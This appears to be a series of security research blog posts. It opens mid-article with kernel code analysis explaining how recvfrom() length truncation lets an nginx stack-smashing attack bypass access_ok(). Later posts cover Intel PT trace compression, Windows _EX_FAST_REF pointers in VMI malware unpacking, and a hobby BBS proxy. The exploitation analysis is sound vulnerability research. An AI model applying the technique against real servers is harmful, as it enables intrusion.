<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">sock</span><span class="o">-></span><span class="n">file</span><span class="o">-></span><span class="n">f_flags</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="n">O_NONBLOCK</span><span class="p">)</span>
<span class="w"> </span><span class="n">flags</span><span class="w"> </span><span class="o">|=</span><span class="w"> </span><span class="n">MSG_DONTWAIT</span><span class="p">;</span>
<span class="w"> </span><span class="n">err</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">sock_recvmsg</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span><span class="w"> </span><span class="o">&</span><span class="n">msg</span><span class="p">,</span><span class="w"> </span><span class="n">flags</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">err</span><span class="w"> </span><span class="o">>=</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">addr</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">err2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">move_addr_to_user</span><span class="p">(</span><span class="o">&</span><span class="n">address</span><span class="p">,</span>
<span class="w"> </span><span class="n">msg</span><span class="p">.</span><span class="n">msg_namelen</span><span class="p">,</span><span class="w"> </span><span class="n">addr</span><span class="p">,</span><span class="w"> </span><span class="n">addr_len</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">err2</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span>
<span class="w"> </span><span class="n">err</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">err2</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="n">fput_light</span><span class="p">(</span><span class="n">sock</span><span class="o">-></span><span class="n">file</span><span class="p">,</span><span class="w"> </span><span class="n">fput_needed</span><span class="p">);</span>
<span class="nl">out</span><span class="p">:</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">err</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>This code performs two relevant checks. The first occurs in:</p>
<div class="highlight"><pre><span></span><code><span class="n">err</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">import_single_range</span><span class="p">(</span><span class="n">READ</span><span class="p">,</span><span class="w"> </span><span class="n">ubuf</span><span class="p">,</span><span class="w"> </span><span class="n">size</span><span class="p">,</span><span class="w"> </span><span class="o">&</span><span class="n">iov</span><span class="p">,</span><span class="w"> </span><span class="o">&</span><span class="n">msg</span><span class="p">.</span><span class="n">msg_iter</span><span class="p">);</span>
</code></pre></div>
<p>And the second occurs in:</p>
<div class="highlight"><pre><span></span><code><span class="n">err2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">move_addr_to_user</span><span class="p">(</span><span class="o">&</span><span class="n">address</span><span class="p">,</span><span class="w"> </span><span class="n">msg</span><span class="p">.</span><span class="n">msg_namelen</span><span class="p">,</span><span class="w"> </span><span class="n">addr</span><span class="p">,</span><span class="w"> </span><span class="n">addr_len</span><span class="p">);</span>
</code></pre></div>
<p>However, we can rule out <code>move_addr_to_user()</code> because the length it is passed,
<code>msg.msg_namelen</code>, is the size of the source address the socket <em>actually</em> returned, which is the same in
our attack regardless of ASLR. This leaves <code>import_single_range()</code>, which is
<a href="http://elixir.free-electrons.com/linux/v4.9-rc4/source/lib/iov_iter.c#L1207">implemented</a>
as follows:</p>
<div class="highlight"><pre><span></span><code><span class="kt">int</span><span class="w"> </span><span class="nf">import_single_range</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">rw</span><span class="p">,</span><span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="n">__user</span><span class="w"> </span><span class="o">*</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="kt">size_t</span><span class="w"> </span><span class="n">len</span><span class="p">,</span>
<span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="nc">iovec</span><span class="w"> </span><span class="o">*</span><span class="n">iov</span><span class="p">,</span><span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="nc">iov_iter</span><span class="w"> </span><span class="o">*</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">len</span><span class="w"> </span><span class="o">></span><span class="w"> </span><span class="n">MAX_RW_COUNT</span><span class="p">)</span>
<span class="w"> </span><span class="n">len</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">MAX_RW_COUNT</span><span class="p">;</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="o">!</span><span class="n">access_ok</span><span class="p">(</span><span class="o">!</span><span class="n">rw</span><span class="p">,</span><span class="w"> </span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">len</span><span class="p">)))</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="o">-</span><span class="n">EFAULT</span><span class="p">;</span>
<span class="w"> </span><span class="n">iov</span><span class="o">-></span><span class="n">iov_base</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">buf</span><span class="p">;</span>
<span class="w"> </span><span class="n">iov</span><span class="o">-></span><span class="n">iov_len</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">len</span><span class="p">;</span>
<span class="w"> </span><span class="n">iov_iter_init</span><span class="p">(</span><span class="n">i</span><span class="p">,</span><span class="w"> </span><span class="n">rw</span><span class="p">,</span><span class="w"> </span><span class="n">iov</span><span class="p">,</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="n">len</span><span class="p">);</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">EXPORT_SYMBOL</span><span class="p">(</span><span class="n">import_single_range</span><span class="p">);</span>
</code></pre></div>
<p>In this function, a sanity check is performed via <code>access_ok()</code> to make sure
the number of bytes requested by the caller cannot cause a write that would
cross into kernel space. But as we pointed out before, the value nginx's worker
is passing here is <code>0xaaaaaaaaaaaaaab0</code>, which should easily cross the boundary
regardless of ASLR. The type <code>size_t</code> is defined as an unsigned 64-bit integer
in our case, so <code>access_ok()</code> should be passed <code>0xaaaaaaaaaaaaaab0</code>, right?
Actually, if we look more closely, we can see the following lines enforce a
limit on <code>len</code>:</p>
<div class="highlight"><pre><span></span><code><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">len</span><span class="w"> </span><span class="o">></span><span class="w"> </span><span class="n">MAX_RW_COUNT</span><span class="p">)</span>
<span class="w"> </span><span class="n">len</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">MAX_RW_COUNT</span><span class="p">;</span>
</code></pre></div>
<p>If we look up <code>MAX_RW_COUNT</code>, we can see it equals <code>(INT_MAX & PAGE_MASK)</code>,
which with 4 KiB pages is <code>0x7ffff000</code>, a value that fits in 32 bits. In other words, even though <code>recvfrom()</code>
accepts 64-bit unsigned lengths on <code>x86_64</code>, <code>import_single_range()</code> silently truncates
any larger length down to <code>MAX_RW_COUNT</code>! On a 64-bit processor, this truncation
combined with ASLR's relocation of the stack allows our attack to pass the
<code>access_ok()</code> check and smash nginx's stack.</p>
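<p>To make the effect concrete, here is a small user-space model of the two steps in <code>import_single_range()</code>: cap the length, then range-check the buffer. It is a sketch, not kernel code. It assumes 4 KiB pages, and <code>user_range_ok()</code> is a simplified stand-in for <code>access_ok()</code> that compares against an assumed user-space limit of <code>0x7ffffffff000</code> (x86_64 with 4-level paging). The buffer addresses in the test are made up for illustration.</p>

```c
#include <limits.h>
#include <stdint.h>

/* Assumption: 4 KiB pages, as on typical x86_64 kernels. */
#define MODEL_PAGE_SIZE 4096ULL
#define MODEL_PAGE_MASK (~(MODEL_PAGE_SIZE - 1))

/* Same formula as the kernel's MAX_RW_COUNT: INT_MAX & PAGE_MASK. */
#define MODEL_MAX_RW_COUNT ((uint64_t)INT_MAX & MODEL_PAGE_MASK)

/* Assumed first address above user space (x86_64, 4-level paging). */
#define MODEL_USER_LIMIT 0x7ffffffff000ULL

/* Step 1: cap the requested length, as import_single_range() does. */
uint64_t clamp_len(uint64_t len) {
    return len > MODEL_MAX_RW_COUNT ? MODEL_MAX_RW_COUNT : len;
}

/* Step 2: simplified access_ok(). Returns 1 if [addr, addr + len) stays
   below the user-space limit. Rearranged to avoid overflow in addr + len. */
int user_range_ok(uint64_t addr, uint64_t len) {
    return len <= MODEL_USER_LIMIT && addr <= MODEL_USER_LIMIT - len;
}
```

<p>With the original length, the check fails no matter where the buffer is. After capping, the result depends on the buffer's address, which is where the stack's randomized placement comes into play.</p>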
<p>Technically, this isn't a bug from the
kernel's perspective because <code>import_single_range()</code> also calls <code>iov_iter_init()</code>
with the truncated length. This means <code>recvfrom()</code> can receive at most the truncated
length in bytes from the socket, so checking only the truncated value with
<code>access_ok()</code> is safe.</p>
<p>That said, it's a really odd way of implementing this system call. From the caller's
perspective, nothing signals that a 64-bit length larger than <code>MAX_RW_COUNT</code> will
be silently reduced to <code>MAX_RW_COUNT</code>. Also, <code>recvfrom()</code> treats the length as a 64-bit value
all the way through its logic, so it's not immediately obvious where the truncation
happens. Additionally, as Hong and I discovered, there
is a security consequence to this choice. Performing the <code>access_ok()</code> check on
the truncated length allows network attacks that rely on integer overflow and
underflow to succeed where they would otherwise likely be blocked by the kernel
through a failed system call. We find this an interesting consequence since
it results from seemingly unrelated design decisions. It is hard to recommend that
the Linux kernel developers revise <code>import_single_range()</code> given that the real
problem is a bug in nginx and not the Linux kernel itself, but we find this
discovery fascinating regardless.</p>Intel PT Data at Rest: A Compression Experiment2017-10-28T10:30:00-04:002017-10-28T10:30:00-04:00Carter Yagemanntag:carteryagemann.com,2017-10-28:/pt-data-at-rest.html<p><em>Full Disclosure: I am a researcher in Georgia Tech's
<a href="http://istc-arsa.iisp.gatech.edu">ISTC-ARSA</a>, which is funded by
Intel. Although I reference two publications that share Xinyang Ge and Weidong Cui as
authors, I am associated with neither them nor Microsoft Research at the time
of writing.</em></p>
<p>Intel Processor Trace (PT) is a powerful hardware feature for recording the
behavior of CPUs. With it, developers and researchers can monitor the
control-flow path taken by threads, hardware interrupts, and more, all with
cycle-accurate timing. However, this rich stream of data comes at the cost of
size. Depending on what PT is configured to trace, it can output <em>hundreds of
megabytes</em> of data <em>per second per core</em>. PT does save bandwidth by
recording only changes in control flow, omitting the high-order bits of a target
address that match the previously recorded target, and compressing returns whose
targets match their preceding calls. Even so, the volume of data is still massive.</p>
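<p>The idea behind dropping redundant high-order address bits can be sketched in a few lines of C. This is a simplified model, not the exact packet encoding from Intel's documentation: it only computes how many low-order bytes of a new target differ from the previously recorded one, assuming the encoder can emit 2, 4, 6, or 8 bytes, and shows how a decoder would splice them back in.</p>

```c
#include <stdint.h>

/* Returns how many low-order bytes must be emitted so that a decoder holding
   the previous target `last_ip` can rebuild `ip` by replacing only those
   bytes. Simplified model: the allowed widths are 2, 4, 6, or 8 bytes. */
unsigned ip_bytes_needed(uint64_t last_ip, uint64_t ip) {
    static const unsigned widths[] = {2, 4, 6};
    for (unsigned i = 0; i < sizeof widths / sizeof widths[0]; i++) {
        unsigned shift = 8 * widths[i];
        /* Upper bytes are identical, so they can be left out. */
        if ((ip >> shift) == (last_ip >> shift))
            return widths[i];
    }
    return 8; /* nothing in common: send the full address */
}

/* Decoder side: splice the `n` transmitted low bytes onto `last_ip`. */
uint64_t ip_reconstruct(uint64_t last_ip, uint64_t low_bytes, unsigned n) {
    if (n >= 8)
        return low_bytes;
    uint64_t mask = ((uint64_t)1 << (8 * n)) - 1;
    return (last_ip & ~mask) | (low_bytes & mask);
}
```

<p>Nearby jumps within the same code region need only a couple of bytes, which is why tight loops produce far less trace data than their instruction count would suggest.</p>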
<p>As a consequence, much of the work
published so far handles tracing in one of two ways. One option is to consume the
trace as it is generated. This works as long as the consumer can keep up with the
producer, which is the case in the control-flow integrity (CFI) system
<a href="https://www.microsoft.com/en-us/research/wp-content/uploads/2017/01/griffin-asplos17.pdf">Griffin</a>.
The other common approach is to configure PT to write in a circular
buffer. This option is suitable for crash dump analysis systems like
<a href="https://dl.acm.org/authorize?N47279">Snorlax</a>, which only need a fixed size
window into a thread's past.</p>
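<p>The circular-buffer approach keeps only the most recent window of trace data. PT can be configured to wrap its output in hardware; the software analogue below is only meant to illustrate the retention behavior, and every name in it is hypothetical.</p>

```c
#include <stddef.h>

/* Fixed-size ring that retains only the most recent `cap` bytes. */
struct ring {
    unsigned char *buf; /* caller-provided storage of `cap` bytes */
    size_t cap;         /* capacity in bytes (must be > 0) */
    size_t head;        /* index where the next byte will be written */
    size_t len;         /* number of valid bytes (<= cap) */
};

void ring_init(struct ring *r, unsigned char *storage, size_t cap) {
    r->buf = storage;
    r->cap = cap;
    r->head = 0;
    r->len = 0;
}

/* Append bytes, overwriting the oldest data once the ring is full. */
void ring_write(struct ring *r, const unsigned char *data, size_t n) {
    for (size_t i = 0; i < n; i++) {
        r->buf[r->head] = data[i];
        r->head = (r->head + 1) % r->cap;
        if (r->len < r->cap)
            r->len++;
    }
}

/* Copy the retained bytes, oldest first, into `out` (room for r->len bytes).
   Returns the number of bytes copied. */
size_t ring_snapshot(const struct ring *r, unsigned char *out) {
    size_t start = (r->head + r->cap - r->len) % r->cap;
    for (size_t i = 0; i < r->len; i++)
        out[i] = r->buf[(start + i) % r->cap];
    return r->len;
}
```

<p>Memory use stays fixed no matter how long the program runs, which is exactly why this suits crash analysis but cannot preserve a full trace.</p>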
<p>However, while some applications are feasible using the two previous methods,
there are still situations where it is desirable to store the entire trace for
postmortem analysis. If nothing else, it is useful for repeatable experiments.
With this in mind, I performed a naive experiment last night to explore whether
more can be done to compress PT traces when <em>the data is at rest</em>. Based on the
observations that the compression PT applies is highly localized (i.e., a target
address versus the previously recorded target address and a return versus the
previously recorded call) and that programs often execute repetitive loops,
I hypothesized that even a general-purpose compression algorithm should
be able to compress traces with a good ratio.</p>
<h2>Procedure</h2>
<p>The overall idea for the experiment is very simple: gather some PT traces,
compress them with a commonly used algorithm, and compare the sizes.
As a subject, I used the simple HTTP server that comes with Python 2.7 to host
a copy of this blog. For each trial, I had a crawler request pages from the
server for a set duration. Once the time expired, I terminated the server and
crawler and stopped the tracing. I then compressed the trace using the GNU/Linux
utility <code>gzip</code>, which uses DEFLATE (LZ77 Lempel-Ziv coding combined with Huffman coding). I also fed it through a
disassembler that matches the PT packets to the binary's static code to
produce a linear sequence of instructions. From this I counted the number of
unique basic blocks executed during the trace to serve as a rough proxy for code
coverage. To summarize the procedure:</p>
<ol>
<li>Configure and enable PT tracing.</li>
<li>Start the Python HTTP server.</li>
<li>Start the crawler.</li>
<li>Wait for a specified duration.</li>
<li>Terminate the crawler and server.</li>
<li>Stop PT tracing.</li>
<li>Compress the resulting trace and count the number of unique basic blocks executed.</li>
</ol>
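<p>Counting unique basic blocks is straightforward once the disassembler's output has been reduced to a list of block start addresses. The sketch below assumes exactly that input format, which is hypothetical since the post does not describe the tool's output: sort the addresses, then count the positions where the value changes.</p>

```c
#include <stdint.h>
#include <stdlib.h>

/* qsort comparator for 64-bit addresses (avoids subtraction overflow). */
static int cmp_u64(const void *a, const void *b) {
    uint64_t x = *(const uint64_t *)a;
    uint64_t y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Sorts `blocks` in place and returns the number of distinct addresses. */
size_t count_unique_blocks(uint64_t *blocks, size_t n) {
    if (n == 0)
        return 0;
    qsort(blocks, n, sizeof blocks[0], cmp_u64);
    size_t unique = 1;
    for (size_t i = 1; i < n; i++)
        if (blocks[i] != blocks[i - 1])
            unique++;
    return unique;
}
```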
<h2>Results</h2>
<p><center>
<img alt="Figure 1" src="https://carteryagemann.com/images/pt-at-rest-fig1.png">
</center></p>
<p>Comparing the original size of the PT trace to the size after compression
produces the above graph. Both series are best fit by linear regressions and
increase over time. However, the compressed size grows
at a slower rate than the uncompressed size, meaning the two plots
diverge as time increases.</p>
<p>Another observation to note is the large volume of
trace data produced during the server's startup.
This explains why even the shortest trial produced a 1GB trace.
For the same reason, counting the number of unique basic blocks turned out
not to be useful: startup dominated the count, and the number of new basic
blocks executed while serving requests was small.</p>
<p><center>
<img alt="Figure 2" src="https://carteryagemann.com/images/pt-at-rest-fig2.png">
</center></p>
<p>The next graph shows the relationship between the compressed and uncompressed
sizes as a <a href="https://en.wikipedia.org/wiki/Data_compression_ratio#Definitions">space savings</a>
percentage. The plot best fits a linear regression and shows the savings
decreasing over time. This is likely due to the design of the underlying
compression algorithm, which is intended for general use and does not take into
consideration the unique characteristics of PT traces.</p>
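<p>For reference, space savings is one minus the ratio of compressed size to uncompressed size, and the compression ratio is its reciprocal view. The helpers below compute both; the sizes in the test are made up and are not measurements from this experiment.</p>

```c
#include <stdint.h>

/* Space savings = 1 - compressed / uncompressed (0.75 means 75% smaller). */
double space_savings(uint64_t uncompressed, uint64_t compressed) {
    if (uncompressed == 0)
        return 0.0; /* undefined for an empty trace; report no savings */
    return 1.0 - (double)compressed / (double)uncompressed;
}

/* Compression ratio = uncompressed / compressed (4.0 means 4:1). */
double compression_ratio(uint64_t uncompressed, uint64_t compressed) {
    return compressed == 0 ? 0.0 : (double)uncompressed / (double)compressed;
}
```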
<p>To summarize, this experiment shows that more can be done to compress PT traces
for storage at rest.</p>
<h2>Discussion</h2>
<p>It is understandable that the compression used by PT would produce small space
savings compared to general-purpose compression algorithms, given the limitations of
hardware memory and Intel's very strict performance overhead requirements. In practice,
PT produces an overhead of less than 4% in the worst case, and less
than 2% on average. These numbers are based on my own observations and the results
published by other researchers. In short, PT has very few clock cycles and very
little space available for performing compression.</p>
<p>Another factor that deserves consideration is compression's impact on processing
time. For systems that consume PT traces on the fly, the largest source of
performance overhead is not PT tracing itself but rather the time spent
buffering and consuming it. In CFI, for example, the PT trace has to be
matched with the executed code in order to reconstruct control-flow. This is why
the authors of
<a href="https://www.microsoft.com/en-us/research/wp-content/uploads/2017/01/griffin-asplos17.pdf">Griffin</a>
report an 11.9% overhead on the SPECint benchmark despite the 4% overhead of PT itself.
Adding better space saving compression could increase this overhead further.</p>
<p>That said, for storing PT traces at rest, more can be done to better conserve space.</p>Windows _EX_FAST_REF Pointers and Virtual Machine Introspection2017-08-29T23:00:00-04:002017-08-29T23:00:00-04:00Carter Yagemanntag:carteryagemann.com,2017-08-29:/vmi-windows-fastref.html<p>Last week I was working on a
<a href="https://github.com/carter-yagemann/vmi-unpack">VMI-based malware unpacker</a>
for Linux and Windows when I came across an interesting problem. I was trying
to implement a method that would, given a virtual address and process ID,
return the address range of the memory segment it belongs to using VMI.</p>
<p>Implementing this in Linux was no problem for me because it's the OS I'm
most familiar with. The
<a href="https://github.com/carter-yagemann/vmi-unpack/tree/26974ca76505da11a35396dc70f888f374ec88f3/src/process/linux.c#L172">implementation</a>
boils down to getting the current process's <code>task_struct</code>, looking up the
pointer to its memory mapping (<code>task_struct->mm</code>), and then iterating through its
linked list of virtual memory areas (<code>mm->mmap</code>) until a match is found. Pretty
straightforward.</p>
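<p>The Linux walk can be sketched with a simplified stand-in for the kernel's <code>vm_area_struct</code>. This is not the vmi-unpack code: the struct below keeps only the three fields the lookup needs, and in a real VMI tool every pointer dereference would instead be a read of guest memory. More recent kernels have replaced this linked list with a different structure, so the sketch matches the older layout the post describes.</p>

```c
#include <stddef.h>
#include <stdint.h>

/* Simplified stand-in for vm_area_struct; real layouts vary by kernel. */
struct vma {
    uint64_t vm_start;   /* first address in the area */
    uint64_t vm_end;     /* first address past the area (exclusive) */
    struct vma *vm_next; /* next area, in ascending address order */
};

/* Walks the list starting at `mmap` and returns the area containing `addr`,
   or NULL if no area does. */
const struct vma *find_vma_linear(const struct vma *mmap, uint64_t addr) {
    for (const struct vma *v = mmap; v != NULL; v = v->vm_next) {
        if (addr >= v->vm_start && addr < v->vm_end)
            return v;
        if (addr < v->vm_start) /* sorted list: no later area can match */
            break;
    }
    return NULL;
}
```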
<p>Windows seemed a little trickier but very similar. The main difference is that while
Linux uses a linked list of structures called virtual memory areas, Windows
uses structures called virtual address descriptors (VADs) linked into a
balanced binary tree. The lookup follows the same pattern. Once the current executive
process (<code>_EPROCESS</code>) is located in memory, read its <code>VadRoot</code> pointer, which, as the name implies,
points to the root of the binary tree of VADs, and then check that VAD's memory range.
Look up the left child if the range is too high, the right child if the range is too low,
and repeat until the desired VAD is located. A straightforward binary search.</p>
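<p>The same search over a VAD-like tree can be sketched as follows. The node type is a hypothetical simplification that uses inclusive byte addresses; the actual VAD structures and their field names differ across Windows versions, and a VMI tool would read each node from guest memory.</p>

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical, simplified VAD node: one address range plus two children. */
struct vad {
    uint64_t start;     /* first address covered (inclusive) */
    uint64_t end;       /* last address covered (inclusive) */
    struct vad *left;   /* subtree with lower ranges */
    struct vad *right;  /* subtree with higher ranges */
};

/* Binary search for the node whose range contains `addr`; NULL if none. */
const struct vad *find_vad(const struct vad *node, uint64_t addr) {
    while (node != NULL) {
        if (addr < node->start)
            node = node->left;  /* this node's range is too high */
        else if (addr > node->end)
            node = node->right; /* this node's range is too low */
        else
            return node;
    }
    return NULL;
}
```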
<p>So I implemented my VMI function, ran it, and to my surprise it failed. After
some debugging, I discovered that when the code read <code>VadRoot</code>, the pointer
would always be 3 bytes greater than the actual base virtual address of the root VAD. Here are
some examples of raw pointer values my code read on 64-bit Windows 7, printed as little-endian bytes:</p>
<div class="highlight"><pre><span></span><code><span class="mf">1</span><span class="n">b</span><span class="w"> </span><span class="mf">3</span><span class="n">c</span><span class="w"> </span><span class="mf">90</span><span class="w"> </span><span class="mf">02</span><span class="w"> </span><span class="mf">80</span><span class="w"> </span><span class="n">fa</span><span class="w"> </span><span class="n">ff</span><span class="w"> </span><span class="n">ff</span>
<span class="mf">6</span><span class="n">b</span><span class="w"> </span><span class="mf">3</span><span class="n">d</span><span class="w"> </span><span class="mf">6</span><span class="n">a</span><span class="w"> </span><span class="mf">02</span><span class="w"> </span><span class="mf">80</span><span class="w"> </span><span class="n">fa</span><span class="w"> </span><span class="n">ff</span><span class="w"> </span><span class="n">ff</span>
<span class="mf">3</span><span class="n">b</span><span class="w"> </span><span class="mf">69</span><span class="w"> </span><span class="mf">8</span><span class="n">e</span><span class="w"> </span><span class="mf">01</span><span class="w"> </span><span class="mf">80</span><span class="w"> </span><span class="n">fa</span><span class="w"> </span><span class="n">ff</span><span class="w"> </span><span class="n">ff</span>
</code></pre></div>
<p>Why are the 4 least significant bits always <code>0xb</code> and why was I only having
this problem with the <code>VadRoot</code> pointer and no other pointers? Stumped, I posted
my question to the
<a href="https://groups.google.com/forum/#!topic/vmitools/G4EVxAAE71c">libVMI forum</a>
and the developer of <a href="https://drakvuf.com/">DRAKVUF</a> kindly pointed out the
answer:
<em>the Windows kernel sometimes uses a special pointer called a <code>_EX_FAST_REF</code>.</em></p>
<p>If you take a look at the definition for this type, you will notice something
interesting:</p>
<div class="highlight"><pre><span></span><code><span class="k">typedef</span><span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="nc">_EX_FAST_REF</span>
<span class="p">{</span>
<span class="w"> </span><span class="k">union</span>
<span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">PVOID</span><span class="w"> </span><span class="n">Object</span><span class="p">;</span>
<span class="w"> </span><span class="n">ULONG</span><span class="w"> </span><span class="n">RefCnt</span><span class="o">:</span><span class="w"> </span><span class="mi">3</span><span class="p">;</span>
<span class="w"> </span><span class="n">ULONG</span><span class="w"> </span><span class="n">Value</span><span class="p">;</span>
<span class="w"> </span><span class="p">};</span>
<span class="p">}</span><span class="w"> </span><span class="n">EX_FAST_REF</span><span class="p">,</span><span class="w"> </span><span class="o">*</span><span class="n">PEX_FAST_REF</span><span class="p">;</span>
</code></pre></div>
<p>As you can see, the Windows kernel uses the 3 least significant bits as a
reference counter. Therefore, in order to read this pointer correctly using
VMI, these bits need to be masked out after reading the pointer. Once I realized
such a pointer existed, the rest of the
<a href="https://github.com/carter-yagemann/vmi-unpack/tree/26974ca76505da11a35396dc70f888f374ec88f3/src/process/windows.c#L170">implementation</a>
was straightforward.</p>
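<p>As a sketch of the masking step, the helpers below decode one of the little-endian byte sequences shown earlier and strip the reference-count bits. The bit count is taken from the definition above (3) and kept in a single constant, since it is an assumption worth checking against the symbols for the specific Windows build being introspected. This is an illustration, not the vmi-unpack implementation.</p>

```c
#include <stdint.h>

/* Assemble a 64-bit value from 8 bytes stored least-significant first. */
uint64_t read_le64(const unsigned char b[8]) {
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--)
        v = (v << 8) | b[i];
    return v;
}

/* Low bits used as the reference count, per the definition quoted above.
   Assumption: verify this for the target Windows build. */
#define FAST_REF_BITS 3
#define FAST_REF_MASK (((uint64_t)1 << FAST_REF_BITS) - 1)

/* Clear the reference-count bits to recover the object pointer. */
uint64_t fast_ref_object(uint64_t raw) {
    return raw & ~FAST_REF_MASK;
}

/* Extract just the reference-count bits. */
unsigned fast_ref_count(uint64_t raw) {
    return (unsigned)(raw & FAST_REF_MASK);
}
```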
<p>So there you have it. The Windows kernel sometimes uses a special pointer that
stashes a reference counter in the lower bits. Something to watch out for when
you're doing virtual machine introspection. Hopefully this blog post will save
others some time.</p>You never know where your code will end up.2017-07-28T16:30:00-04:002017-07-28T16:30:00-04:00Carter Yagemanntag:carteryagemann.com,2017-07-28:/bbs-4chan.html<p>I was searching through an archive site for 4Chan when I noticed that my name
was in a random post on the Technology board, /g/:</p>
<div class="highlight"><pre><span></span><code>Anonymous Sat Jun 17 11:13:54 2017 No.60943336
>>60943289
I'm running it locally, but you can get it here:
https://github.com/carter-yagemann/4ChanBBS
It uses the official API to retrieve posts, and it even converts images to ASCII
</code></pre></div>
<p>The link is for a public repository I created on GitHub. It contains a proxy
server written in Python that allows computers to browse 4Chan via a telnet
connection using a command line interface (CLI) reminiscent of old-school
<a href="https://www.wikipedia.org/wiki/Bulletin_board_system">BBS</a> sites. I wrote it
in a few hours purely as a joke and then never touched it again. Everything
about it was intended as nothing more than a quick laugh, down to how it
crudely converts images into ASCII strings so they can be displayed in the
terminal. I didn't put much effort into the project and I assumed no one would
ever care.</p>
<p>But apparently someone did care and that someone owns a retro computer:</p>
<p><img alt="Retro IBM computer running 4Chan BBS" src="https://carteryagemann.com/images/1497712038601.jpg"></p>
<p>Seeing my code's banner page on a monitor old enough to be from the
days of BBS made my day. I don't know the person who posted this image,
but I'm happy to know someone found value in my forgotten code. It just
goes to show that you never know where your code will end up.</p>Intel Processor Trace, execvp, and ptrace2017-03-21T21:15:00-04:002017-03-21T21:15:00-04:00Carter Yagemanntag:carteryagemann.com,2017-03-21:/pt-execvp-ptrace.html<p>Lately, I've been playing around with Intel Processor Trace (PT), an x86
hardware feature that allows for complete tracing of process control flows.
As part of my research, I've been developing my own Linux driver and user
program to control PT.</p>
<p>Tracing can be configured using a handful of model-specific registers (MSRs)
in the Intel CPU. One useful configuration supported by PT is CR3 filtering.
For readers less familiar with x86 architecture: when a user process is
executing, the CPU's CR3 register holds the physical address of the process's
top-level page table. Since every process has its own page table, each process
also has a CR3 value distinct from that of every other currently scheduled process.
By configuring PT to use a CR3 filter, tracing can be limited to a single
process.</p>
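<p>As a rough illustration of CR3 filtering, the helper below builds an <code>IA32_RTIT_CTL</code> value for user-mode branch tracing restricted to one address space. The MSR addresses and bit positions are as I understand them from Intel's Software Developer's Manual and should be checked against it; the actual <code>wrmsr</code> calls belong in the kernel driver and are not shown. My understanding is that the SDM requires <code>IA32_RTIT_CR3_MATCH</code> and the other configuration MSRs to be written while tracing is disabled, so the target CR3 goes in first and <code>TraceEn</code> is set last.</p>

```c
#include <stdint.h>

/* MSR addresses (verify against the Intel SDM for the target CPU). */
#define MSR_IA32_RTIT_CTL       0x570
#define MSR_IA32_RTIT_CR3_MATCH 0x572

/* IA32_RTIT_CTL bits used below. */
#define RTIT_CTL_TRACEEN  (1ULL << 0)  /* master trace enable */
#define RTIT_CTL_OS       (1ULL << 2)  /* trace when CPL == 0 */
#define RTIT_CTL_USER     (1ULL << 3)  /* trace when CPL > 0 */
#define RTIT_CTL_CR3EN    (1ULL << 7)  /* trace only when CR3 matches */
#define RTIT_CTL_TOPA     (1ULL << 8)  /* table-of-physical-addresses output */
#define RTIT_CTL_BRANCHEN (1ULL << 13) /* emit control-flow packets */

/* Control value for tracing the user-mode branches of a single process.
   The driver would write IA32_RTIT_CR3_MATCH first, then this value. */
uint64_t rtit_ctl_user_cr3(void) {
    return RTIT_CTL_TRACEEN | RTIT_CTL_USER | RTIT_CTL_CR3EN |
           RTIT_CTL_TOPA | RTIT_CTL_BRANCHEN;
}
```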
<p>Early versions of my program could only trace already running processes. I would
use the GNU debugger to start the target process and trap its first instruction,
and then manually pass its PID to my program as an argument. The Linux
driver would then convert the PID into a CR3 value by traversing the process's task
structure (<code>virt_to_phys(task_struct->mm->pgd)</code>) and use this address to
configure PT (<code>IA32_RTIT_CR3_MATCH</code>). Needless to say, having to manually start
and trap the target process got very tiring after repeated tracing.</p>
<p>To simplify tracing a process, I wanted my program to take as parameters the
file path of an executable and its arguments and automatically start and trace
the process. My first attempt roughly followed this pseudocode:</p>
<div class="highlight"><pre><span></span><code><span class="n">pid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">fork</span><span class="p">();</span>
